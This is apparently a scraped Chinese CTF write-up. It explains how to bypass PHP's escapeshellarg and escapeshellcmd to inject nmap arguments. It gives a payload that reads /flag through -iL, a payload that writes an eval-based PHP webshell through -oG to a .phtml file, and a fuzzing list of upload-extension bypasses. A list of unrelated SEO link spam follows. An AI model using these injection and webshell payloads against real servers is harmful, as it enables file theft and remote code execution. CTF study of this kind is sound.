当前位置: 首页 > news >正文

网站怎么做跳转链接佛山网站seo

网站怎么做跳转链接,佛山网站seo,建设银行插u盾网站上不去,如何做网站弹窗广告这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里PHP escapeshellarg()escapeshellcmd() 之殇 (seebug.org) 两种解题方法: 第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入we…

这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)

两种解题方法:

第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell

-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式

第一种:

这道题首先我们在注释里面看到了flag存放的位置

可以利用nmap 的-iL参数读取flag到一个文件中,我们再访问生成的文件即可

构造一个payload:

127.0.0.1' -iL /flag -o haha
经过escapeshellarg函数后
'127.0.0.1'\'' -iL /flag -o haha'(将单引号转义并用一对单引号包裹起来,再将这个语句用单引号包裹起来确保只有一个参数)
经过escapeshellcmd函数后
'127.0.0.1'\\'' -iL /flag -o haha\'
对\转义,在许多编程语言中,反斜杠被用作转义字符,用来表示特殊字符或序列。这里面两个相邻的反斜杠\表示一个单独的反斜杠字符,没有转义作用。而末尾单引号转义过后的普通字符仍然是它本身,没有变化,会被视为普通字符不具有单引号的作用了
这样就分为了三部分'127.0.0.1'和''连接空白和-iL /flag -o haha'(最后这个单引号只有一个不起作用,但它将最后的文件名变为了haha')
nmap既可扫描前面的ip,又能执行-iL /flag -o haha'

ip中输入,因为'127.0.0.1'\\执行的时候会被简化为127.0.0.1\,这个ip就错了,但是不用管报错,只要后面命令执行了我们就能访问到

记住文件名变为了haha'   直接访问即可看到flag

第二种

正常利用nmap参数-oG写一句话木马:127.0.0.1 | <?=@eval($_REQUEST['cmd']);?> -oG shell.php

显然有东西被过滤,多半是php的原因

用我这个后缀名字典burp爆破后缀发现还是有很多能用的,我们这里就用phtml了

php
php2
php3
php4
php5
pHp
pHp2
pHp3
pHp4
pHp5
html
htm
phtml
pht
Html
Htm
pHtml
asp
aspx
asa
asax
ashx
asmx
cer
aSp
aSpx
aSa
aSax
aScx
aShx
aSmx
cEr
jsp
jspa
jspx
jsw
jxv
jspf
jtml
JSp
jSpx
jSpa
jSw
jSv
jSpf
jHtml
asp/test.jpg
asp;.jpg
cer/test.jpg
cer;.jpg
asa/test.jpg
asa;.jpg
aSp/test.jpg
aSp;.jpg
cEr/test.jpg
cEr;.jpg
aSa/test.jpg
aSa;.jpg
jpg/xx.php
jpg/xx.pHp
jpg/.php
jpg/.pHp
php.xs.aa
php2.aa
php3.aa
php4.aa
php5.aa
pHp.aa
pHp2.aa
pHp3.aa
pHp4.aaa
pHp5.aa
html.aa
htm.aa
phtml.aa
pht.aaa
Html.aaa
Htm.aa
pHtml.aa
php::$DATA

构造payload:127.0.0.1 | ' <?=@eval($_POST["cmd"]);?> -oG shell.phtml '

蚁剑直接连上

escapeshellcmd函数只会转义一些特殊字符,如单引号、双引号、反斜杠等,以防止它们被误解为命令的一部分。它并不会对<?=@eval($_POST[cmd]);?>中的特殊字符进行转义,因为这个字符串看起来更像是PHP代码片段,而不是外部命令参数。

http://www.tj-hxxt.cn/news/68270.html

相关文章:

  • 网站做web服务器站长之家ping检测
  • 蓝天网站建设合肥百度快照优化排名
  • 移动互联网站设计师网站推广去哪家比较好
  • 帮人盖章网站备案授权书黑马培训是正规学校吗
  • 高端手机网站建设爱站网关键词挖掘工具熊猫
  • 婚恋网站制作要多少钱社群营销成功案例
  • 赣州建设部网站郑州网站建设公司
  • 强的网站建设公游戏推广公司靠谱吗
  • 益阳做网站如何优化关键词的方法
  • 网站公安局备案规定天津站内关键词优化
  • 电影网页制作模板河北百度seo关键词
  • 重庆承越网站建设公武汉千锋教育培训机构怎么样
  • 毕业设计医院网站设计怎么做seo 优化
  • 做网站的服务器有哪些新闻最新热点
  • 哪个网站做自行车评测的seo推广软件
  • 算命网站做竞价赚钱百度账户托管运营
  • 网页设计网站怎么做特效免费注册
  • 网站持有者和备案企业官方网站百度一下
  • 做标签网站是什么怎么做蛋糕
  • 网站 网页制作怎么查找关键词排名
  • 博罗网站建设公司拼多多推广引流软件免费
  • 合肥网站设计建设如何让百度快速收录
  • 怎么构建一个网站seo怎么做关键词排名
  • 网站制作 flash 修改社交媒体营销
  • 如何做网站策划semantic ui
  • 做微商网站seo建站还有市场吗
  • 有哪些调查网站可以做兼职网页搜索关键字
  • 营销型网站公司名称沈阳seo关键词
  • 网站兼容ie代码搜索引擎seo关键词优化
  • 做动画网站公司湖南seo优化哪家好